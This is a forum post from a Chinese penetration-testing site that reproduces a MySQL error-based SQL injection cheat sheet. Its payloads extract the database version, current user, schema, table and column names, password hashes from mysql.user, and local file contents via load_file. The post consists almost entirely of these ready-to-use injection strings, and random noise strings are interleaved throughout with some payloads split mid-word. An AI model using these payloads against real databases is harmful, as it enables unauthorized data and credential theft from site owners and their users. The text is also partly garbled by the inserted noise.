中国网络渗透测试联盟
标题:
Mysql暴错注入参考(pdf)
[打印本页]
作者:
admin
时间:
2013-7-27 11:00
标题:
Mysql暴错注入参考(pdf)
本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
) [0 h o2 T2 `, o
0 h8 {9 J ^& c+ t% F1 S& B" A
}$ S' O u9 @8 g' N$ c8 e
Mysql暴错注入参考(pdf),每天一贴。。。
/ P0 t6 K( q |5 b }: @. _
C, c9 l2 [/ }1 x6 T. A
MySql Error Based Injection Reference
2 }- T; J+ V( @
[Mysql暴错注入参考]
/ Z8 Q) Q" g1 F5 T) t- W1 `
Authornig0s1992
" U+ h8 D- ~ E1 b/ `( b7 |. `
Blog:
http://pnig0s1992.blog.51cto.com/
8 A3 n8 B; |/ L
TeAm:
http://www.FreeBuf.com/
0 _4 U5 [$ D4 m$ B2 J* N n$ a
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
) [% @8 M7 a) |' L) z$ W' R$ l
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
3 Q6 [ x1 r! q; e/ e# R
查询版本:
' e! c* s& u7 ^% S
Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
( w- z1 U; v9 i/ H' ^
join+(select+name_const(@@version,0))b)c)
8 ?: ]$ q3 J- u4 M S
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
* J+ x* L, v/ M
up by a)b)
6 K& f8 {6 w2 L7 \
查询当前用户:
' u$ w2 |, F( X0 }
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
0 u, L5 d8 v9 l! F* a: N2 Z
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
$ |/ ?1 v% D4 z' R
and(0)*2))x+from+information_schema.tables+group+by+x)a)
1 V7 B* P1 B4 C
查询当前数据库:
8 W7 J5 T2 |- Z$ j9 m* f- E, Y
Method.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
2 T5 E" N( |- N9 K& p
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
; p+ D4 ?; i/ h) _/ `/ ?5 d, c
or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
3 h% C0 @+ L/ _5 c6 a( P$ x6 R5 @
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
1 ]: g8 J# G1 p9 z
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
- r3 s2 y% n5 e1 \8 ?* w
顺序替换
8 Y: K- d7 t) v2 [8 q0 u* Y
爆指定库数目:
6 n5 C1 X* E& ~0 ?6 D
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
# m( v! C, S' ^8 t6 H
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
+ k0 O$ T; A6 m: `3 d8 M/ x) D
+by+x)a)+and+1=1 0x6D7973716C=mysql
1 t/ Z, ^1 x% s# k
依次爆表:
0 |, F/ I; f7 p& O% p; H; N
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
- p6 [/ P, @. r' R5 b9 R
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
2 @& }8 E, h8 Y' E8 N0 J$ X6 C
bles+group+by+x)a)+and+1=1
( j ]3 Q7 W; |
0x6D7973716C=Mysql 将n顺序替换
/ f( ?$ [2 [& y# E, Z& b
爆表内字段数目:
. c3 @9 j6 y5 e* m i) `
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
; r6 ~5 L& f4 |2 p
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
9 |, b/ q$ W: L. S$ @; l; {
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
2 W. {! v+ ?0 D" e
依次爆字段:
& l3 [+ H& A& _/ J8 l
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
; @. a1 t+ m! ]& G
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
) i* s( J- _" ?- S& ~
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1 将n顺序替换
4 k, i0 {& [- u' f
依次暴内容:
7 x4 e9 D4 s0 d+ n6 z6 {" R
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
$ j5 d$ f/ z; \1 s
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
+ i1 x4 h% S8 `- O/ u
将n顺序替换
; t x3 V% H/ r- ?6 m( A0 g2 w
爆文件内容:
' I& d7 M5 P9 u% q
and+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
3 S* O+ U- N6 ]% o$ a1 ~ N3 `4 a
from+information_schema.tables+group+by+a)b)
1 E7 @" k0 ]! v3 W" V
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
* z/ _& p7 U& P" g3 L' {& _1 z8 h
Thx for reading.
1 ^% @ ~+ ~! B; {8 ]* j! B
W0 y# {& k4 E1 |
不要下载也可以,
n- P* S9 B3 E, x/ S" Q+ }
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2